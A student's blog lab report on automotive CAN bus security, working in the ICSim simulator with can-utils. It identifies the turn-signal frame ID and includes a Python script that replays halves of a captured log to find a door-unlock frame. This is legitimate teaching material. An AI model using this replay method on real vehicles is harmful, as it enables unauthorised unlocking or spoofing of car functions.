<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="dawn_r1sing">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://dawnringDong.github.io/2025/07/13/竞学实训（4）/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="实验 CAN Security一．实验目的理解汽车CAN总线通信协议的安全机制与脆弱性。 掌握基于ICSim的CAN网络模拟环境搭建。 实操常见CAN攻击技术并分析防御方案 二．实验内容（一）模拟CAN信号通信1. 虚拟CAN接口创建 创建模拟一个虚拟CAN接口，用于后续的报文收发和攻击模拟。  按照参考文章操作即可。  2. 模拟信号通信 请使用can-utils工具包里的不同工具（如candu">
<meta property="og:type" content="article">
<meta property="og:title" content="竞学实训（4）">
<meta property="og:url" content="http://dawnringdong.github.io/2025/07/13/%E7%AB%9E%E5%AD%A6%E5%AE%9E%E8%AE%AD%EF%BC%884%EF%BC%89/index.html">
<meta property="og:site_name" content="dawn">
<meta property="og:description" content="实验 CAN Security一．实验目的理解汽车CAN总线通信协议的安全机制与脆弱性。 掌握基于ICSim的CAN网络模拟环境搭建。 实操常见CAN攻击技术并分析防御方案 二．实验内容（一）模拟CAN信号通信1. 虚拟CAN接口创建 创建模拟一个虚拟CAN接口，用于后续的报文收发和攻击模拟。  按照参考文章操作即可。  2. 模拟信号通信 请使用can-utils工具包里的不同工具（如candu">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052244158.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052232696.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052232191.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052230000.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052234516.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052235679.jpeg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052236896.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052236013.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052237448.jpeg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052237951.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052237102.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052230379.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052238122.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052239419.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052230282.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052240510.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052240825.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052240677.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052230316.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052241146.jpg">
<meta property="article:published_time" content="2025-07-13T14:42:57.000Z">
<meta property="article:modified_time" content="2025-11-08T03:43:54.261Z">
<meta property="article:author" content="dawn_r1sing">
<meta property="article:tag" content="实验">
<meta property="article:tag" content="课内学习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052244158.jpg">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310311001858.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310311001858.png">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310311001858.png">
    <!--- Page Info-->
    
    <title>
        
            竞学实训（4） -
        
        dawn_r1sing
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
        <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    
<script src="/js/libs/anime.min.js"></script>

    <h1 class="ml13">
        dawn_r1sing
    </h1>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });


        anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [100,0],
                translateZ: 0,
                opacity: [0,1],
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i
            }).add({
            targets: '.ml13 .letter',
            translateY: [0,-100],
            opacity: [1,0],
            easing: "easeInExpo",
            duration: 1200,
            delay: (el, i) => 100 + 30 * i
        });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            hidePreloaderAfterTimeout(1000); // Hide after 1000 milliseconds once the window has loaded
        });

        // Backup failsafe: Hide preloader after a maximum of 5000 milliseconds, regardless of the window load event
        hidePreloaderAfterTimeout(5000);

        function hidePreloaderAfterTimeout(delay) {
            setTimeout(function () {
                var preloader = document.querySelector('.preloader');
                preloader.style.opacity = '0';
                setTimeout(function () {
                    preloader.style.display = 'none';
                }, 200);
            }, delay);
        }
    </script>
</div>
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    <!--- Font Part-->
    
    
    
    


    <script id="hexo-configurations">
    window.config = {"hostname":"dawnringdong.github.io","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"5rem","h2":"4rem","h3":"2.8rem","h4":"2.5rem","h5":"2.2rem","h6":"2rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"simple","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"dawn_r1sing","subtitle":{"text":["Loading..."],"hitokoto":{"enable":true,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":"xiaoran_dong@163.com"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.6.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-home# can be empty"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"About":{"icon":"fa-regular fa-user","submenus":{"Me":"/about"}}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":{"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"}}},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2023/10/29 12:00:00"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>


<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">

    <div class="navbar-content ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                dawn_r1sing
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-home# can be empty fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown"
                                   href="#"
                                        onClick=&#34;return false;&#34;>
                                    <i class="fa-regular fa-user fa-fw"></i>
                                    ABOUT
                                    <i class="fa-solid fa-chevron-down fa-fw"></i>
                                </a>

                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                        
                                            <li>
                                                <a href="/about">
                                                    ME
                                                </a>
                                            </li>
                                        
                                    </ul>
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-home# can be empty fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item-sub text-base my-1.5 flex flex-col w-full">
                        
                        <div class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary cursor-pointer text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                             navbar-data-toggle="submenu-About"
                        >
                            <span>
                                ABOUT
                            </span>
                            
                                <i class="fa-solid fa-chevron-right fa-sm fa-fw transition-all"></i>
                            
                        </div>
                        

                        
                            <div class="flex-col items-start px-2 py-2 hidden" data-target="submenu-About">
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="/about">ME</a>
                                    </div>
                                
                            </div>
                        
                    </li>
            

            
            
                
                    
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/tags"
                        >
                            <span>Tags</span>
                            <i class="fa-regular fa-tags fa-sm fa-fw"></i>
                        </a>
                    </li>
                
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">10</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">33</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color text-4xl md:text-6xl font-bold px-2 sm:px-6 md:px-8 py-3">竞学实训（4）</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310291726035.jpg">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">dawn_r1sing</span>
                        
                            <span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv4</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-07-13 22:42:57</span>
        <span class="mobile">2025-07-13 22:42:57</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2025-11-08 11:43:54</span>
            <span class="mobile">2025-11-08 11:43:54</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/%E5%AE%9E%E9%AA%8C/">实验</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/%E8%AF%BE%E5%86%85%E5%AD%A6%E4%B9%A0/">课内学习</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fa-regular fa-typewriter"></i>&nbsp;<span>3.5k Words</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fa-regular fa-clock"></i>&nbsp;<span>13 Mins</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <h1 id="实验-CAN-Security"><a href="#实验-CAN-Security" class="headerlink" title="实验 CAN Security"></a>实验 CAN Security</h1><h2 id="一．实验目的"><a href="#一．实验目的" class="headerlink" title="一．实验目的"></a><strong>一．实验目的</strong></h2><p>理解汽车CAN总线通信协议的安全机制与脆弱性。</p>
<p>掌握基于ICSim的CAN网络模拟环境搭建。</p>
<p>实操常见CAN攻击技术并分析防御方案</p>
<h2 id="二．实验内容"><a href="#二．实验内容" class="headerlink" title="二．实验内容"></a>二．<strong>实验内容</strong></h2><h4 id="（一）模拟CAN信号通信"><a href="#（一）模拟CAN信号通信" class="headerlink" title="（一）模拟CAN信号通信"></a><strong>（一）模拟CAN信号通信</strong></h4><h5 id="1-虚拟CAN接口创建"><a href="#1-虚拟CAN接口创建" class="headerlink" title="1. 虚拟CAN接口创建"></a>1. <strong>虚拟CAN接口创建</strong></h5><blockquote>
<p>创建模拟一个虚拟CAN接口，用于后续的报文收发和攻击模拟。</p>
</blockquote>
<p>按照参考文章操作即可。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052244158.jpg"
                      alt="img"
                ></p>
<h5 id="2-模拟信号通信"><a href="#2-模拟信号通信" class="headerlink" title="2. 模拟信号通信"></a>2. <strong>模拟信号通信</strong></h5><blockquote>
<p>请使用can-utils工具包里的不同工具（如candump、cansend、cangen等）实现CAN报文的发送和嗅探。</p>
</blockquote>
<p>使用cangen向vcan0发送数据，</p>
<p>使用candump嗅探数据。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052232696.jpg"
                      alt="img"
                ></p>
<h4 id="（二）基于ICSim的基础实践"><a href="#（二）基于ICSim的基础实践" class="headerlink" title="（二）基于ICSim的基础实践"></a><strong>（二）基于ICSim的基础实践</strong></h4><h5 id="1-ICSim模拟环境搭建"><a href="#1-ICSim模拟环境搭建" class="headerlink" title="1. ICSim模拟环境搭建"></a>1. <strong>ICSim模拟环境搭建</strong></h5><blockquote>
<p>请参考网络资料，在你的PC上部署ICSim模拟器并以当前进行实验时的年月日组合为种子（例如：20250713）正确启动，至此你可以通过键盘或者手柄完成对仪表盘功能的控制（转向灯控制、加速控制、车门控制）。</p>
<p>(附上主要截图)</p>
</blockquote>
<p>将项目clone至本地，make编译，运行：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052232191.jpg"
                      alt="img"
                > </p>
<h5 id="2-Can-utils使用"><a href="#2-Can-utils使用" class="headerlink" title="2. Can-utils使用"></a>2. Can-utils使用</h5><blockquote>
<p>使用can-utils工具包里的相关工具完成对CAN数据报文的监听和转储，通过肉眼观察和代码分析，找到与转向灯控制、车门控制、加速控制相关的CAN数据帧。</p>
<p>(附上实验步骤、主要代码和截图)</p>
</blockquote>
<p>对于转向灯控制、加速控制使用肉眼观察法，车门控制使用二分法。</p>
<p><strong>转向灯</strong>：利用cansniffer工具使用肉眼观察，重点看与转向灯同步变化的字节。</p>
<ul>
<li><p>关键数据帧：vcan0 2A3#00000000 - 转向灯关</p>
</li>
<li><p>ID为0x2A3</p>
</li>
<li><p>第2个字节的低两位</p>
<p>从低到高以此表示左灯、右灯</p>
<p>0为不亮，1为亮</p>
</li>
</ul>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052230000.jpg"
                      alt="img"
                ></p>
<p><strong>车门</strong>：使用二分法。记录开车门过程的报文，将报文一分为二，分别进行重放并观察模拟器，如果该片段重放时车门打开，则说明控制车门打开的数据帧在该片段中。对该片段进行重复操作。最后得到关键数据帧，可以通过cansend重放进行检验。（这里以开左前门为例）</p>
<p>具体代码如下：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br></pre></td><td class="code"><pre><span class="line">import argparse</span><br><span class="line"></span><br><span class="line">import os</span><br><span class="line"></span><br><span class="line">import shutil</span><br><span class="line"></span><br><span class="line">import subprocess</span><br><span class="line"></span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def split_file(filename, lines_per_file, prefix):</span><br><span class="line"></span><br><span class="line">  subprocess.run([</span><br><span class="line"></span><br><span class="line">  &#x27;split&#x27;,</span><br><span class="line"></span><br><span class="line">  &#x27;-l&#x27;, str(lines_per_file),</span><br><span class="line"></span><br><span class="line">  &#x27;-d&#x27;,</span><br><span class="line"></span><br><span class="line">  filename, prefix</span><br><span class="line"></span><br><span class="line">], check=True)</span><br><span class="line"></span><br><span class="line">def play_file(filename, interface):</span><br><span class="line"></span><br><span class="line">  print(f&quot;\n重放：&#123;filename&#125;&quot;)</span><br><span class="line"></span><br><span class="line">  subprocess.run([&#x27;canplayer&#x27;, &#x27;-I&#x27;, filename], check=True)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def ask_user():</span><br><span class="line"></span><br><span class="line">  answer = input(&quot;播放该段前车门是否成功打开？ (y/n): &quot;).strip().lower()</span><br><span class="line"></span><br><span class="line">  return answer == &#x27;y&#x27;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">def binary_search_canlog(filename, interface, min_lines=1, level=1):</span><br><span class="line"></span><br><span class="line">  lines = sum(1 for _ in open(filename))</span><br><span class="line"></span><br><span class="line">  if lines &lt;= min_lines:</span><br><span class="line"></span><br><span class="line">​    print(f&quot;\n找到可能的开锁指令帧: &#123;filename&#125;&quot;)</span><br><span class="line"></span><br><span class="line">​    with open(filename, &#x27;r&#x27;) as f:</span><br><span class="line"></span><br><span class="line">​      print(f.read())</span><br><span class="line"></span><br><span class="line">​    return</span><br><span class="line"></span><br><span class="line">  prefix = f&#x27;tmp&#123;level&#125;&#x27;</span><br><span class="line"></span><br><span class="line">  split_file(filename, lines // 2, prefix)</span><br><span class="line"></span><br><span class="line">  part1 = f&#x27;&#123;prefix&#125;00&#x27;</span><br><span class="line"></span><br><span class="line">  part2 = f&#x27;&#123;prefix&#125;01&#x27;</span><br><span class="line"></span><br><span class="line">  if not os.path.exists(part1) or not os.path.exists(part2):</span><br><span class="line"></span><br><span class="line">​    print(f&quot;file not found&quot;)</span><br><span class="line"></span><br><span class="line">​    sys.exit(1)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">  for part in [part1, part2]:</span><br><span class="line"></span><br><span class="line">​    play_file(part, interface)</span><br><span class="line"></span><br><span class="line">​    if ask_user():</span><br><span class="line"></span><br><span class="line">​      binary_search_canlog(part, interface, min_lines, level + 1)</span><br><span class="line"></span><br><span class="line">​      return</span><br><span class="line"></span><br><span class="line">​    else:</span><br><span class="line"></span><br><span class="line">​      os.remove(part)</span><br><span class="line"></span><br><span class="line">  print(&quot;当前轮次未找到有效帧，可能操作未生效。&quot;)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">parser = argparse.ArgumentParser(description=&quot;CAN split&quot;)</span><br><span class="line"></span><br><span class="line">parser.add_argument(&#x27;-s&#x27;, required=True, help=&quot;source&quot;)</span><br><span class="line"></span><br><span class="line">parser.add_argument(&#x27;-i&#x27;, default=&#x27;vcan0&#x27;, help=&quot;e.g. vcan0&quot;)</span><br><span class="line"></span><br><span class="line">parser.add_argument(&#x27;-l&#x27;, type=int, default=1, help=&quot;最小分割行数，默认=1&quot;)</span><br><span class="line"></span><br><span class="line">args = parser.parse_args()</span><br><span class="line"></span><br><span class="line">if not os.path.exists(args.s):</span><br><span class="line"></span><br><span class="line">  print(&quot;file not found&quot;)</span><br><span class="line"></span><br><span class="line">  sys.exit(1)</span><br><span class="line"></span><br><span class="line">binary_search_canlog(args.s, args.i, args.l)</span><br></pre></td></tr></table></figure></div>

<p>具体操作如图：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052234516.jpg"
                      alt="img"
                ></p>
